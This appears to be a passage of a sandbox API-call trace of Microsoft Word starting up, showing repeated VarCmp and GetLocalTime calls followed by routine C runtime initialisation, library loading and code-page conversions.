0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.053] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2a, wSecond=0x3a, wMilliseconds=0x231)) [0114.053] VarAdd (in: pvarLeft=0x197ef0, pvarRight=0x197ee0, pvarResult=0x197ed0 | out: pvarResult=0x197ed0) returned 0x0 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.054] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.054] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.054] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.054] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.054] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2a, wSecond=0x3a, wMilliseconds=0x231)) [0114.275] NtdllDefWindowProc_A (hWnd=0x502a4, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0115.671] NtdllDefWindowProc_A (hWnd=0x502a4, Msg=0xc1ff, wParam=0x50, lParam=0x0) returned 0x0 [0116.296] NtdllDefWindowProc_A (hWnd=0x502a4, Msg=0xc1ff, wParam=0x50, lParam=0x0) returned 0x0 [0116.555] NtdllDefWindowProc_A (hWnd=0x502a4, Msg=0x1c, wParam=0x0, lParam=0xfe0) returned 0x0 [0117.324] GetModuleHandleW (lpModuleName=0x0) returned 0x210000 [0117.336] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.336] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0117.337] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0117.337] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0117.339] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0117.339] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0117.339] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0117.341] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0117.341] GetProcessHeap () returned 0x930000 [0117.341] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0117.342] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0117.342] GetLastError () returned 0x3f0 [0117.343] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0117.343] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x364) returned 0xcb98a28 [0117.343] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0117.343] SetLastError (dwErrCode=0x3f0) [0117.343] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xc00) returned 0xf569980 [0117.345] GetStartupInfoW (in: lpStartupInfo=0x19761c | out: lpStartupInfo=0x19761c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x118c96a0, hStdOutput=0xaad2ba3e, hStdError=0xfffffffe)) [0117.345] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.345] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.345] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.345] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0117.345] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0117.345] GetLastError () returned 0x3f0 [0117.345] SetLastError (dwErrCode=0x3f0) [0117.345] GetLastError () returned 0x3f0 [0117.345] SetLastError (dwErrCode=0x3f0) [0117.345] GetACP () returned 0x4e4 [0117.346] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x220) returned 0xc86d0e8 [0117.346] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.346] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19764c | out: lpCPInfo=0x19764c) returned 1 [0117.346] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x196f14 | out: lpCPInfo=0x196f14) returned 1 [0117.346] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.346] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196cb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.346] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x196f28 | out: lpCharType=0x196f28) returned 1 [0117.346] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.346] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.346] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0117.347] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x769b95f0 [0117.347] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.347] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0117.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x197428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0117.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.347] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.347] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0117.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x197328, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0117.347] RtlInitializeSListHead (in: ListHead=0x1192a0e8 | out: ListHead=0x1192a0e8) [0117.348] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0117.348] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0117.348] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0117.349] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0117.349] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0117.350] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0117.350] GetProcAddress (hModule=0x76720000, lpProcName="InitOnceExecuteOnce") returned 0x769cc2d0 [0117.351] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0117.351] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreW") returned 0x76746710 [0117.352] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0117.352] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0117.352] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0117.353] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0117.353] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0117.354] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0117.354] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0117.355] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0117.355] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0117.355] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0117.399] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0117.399] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0117.400] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0117.400] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0117.401] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleEx") returned 0x76760ea0 [0117.401] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandle") returned 0x76746c30 [0117.401] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x76746cf0 [0117.402] GetProcAddress (hModule=0x76720000, lpProcName="InitializeConditionVariable") returned 0x771f6710 [0117.402] GetProcAddress (hModule=0x76720000, lpProcName="WakeConditionVariable") returned 0x7723c720 [0117.408] GetProcAddress (hModule=0x76720000, lpProcName="WakeAllConditionVariable") returned 0x77238d70 [0117.408] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableCS") returned 0x76a47f60 [0117.409] GetProcAddress (hModule=0x76720000, lpProcName="InitializeSRWLock") returned 0x771f6710 [0117.409] GetProcAddress (hModule=0x76720000, lpProcName="AcquireSRWLockExclusive") returned 0x7721d210 [0117.409] GetProcAddress (hModule=0x76720000, lpProcName="TryAcquireSRWLockExclusive") returned 0x771f3650 [0117.410] GetProcAddress (hModule=0x76720000, lpProcName="ReleaseSRWLockExclusive") returned 0x7721d080 [0117.410] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableSRW") returned 0x76a47fb0 [0117.411] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWork") returned 0x7673ea00 [0117.411] GetProcAddress (hModule=0x76720000, lpProcName="SubmitThreadpoolWork") returned 0x7721ce10 [0117.411] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWork") returned 0x77220550 [0117.412] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0117.412] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0117.413] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x800) returned 0xb3cb958 [0117.413] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.413] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1192a8f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x4c) returned 0xca9c6e8 [0117.413] GetEnvironmentStringsW () returned 0xcac3ce8* [0117.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1511, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1511 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x5e7) returned 0xc867ae0 [0117.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 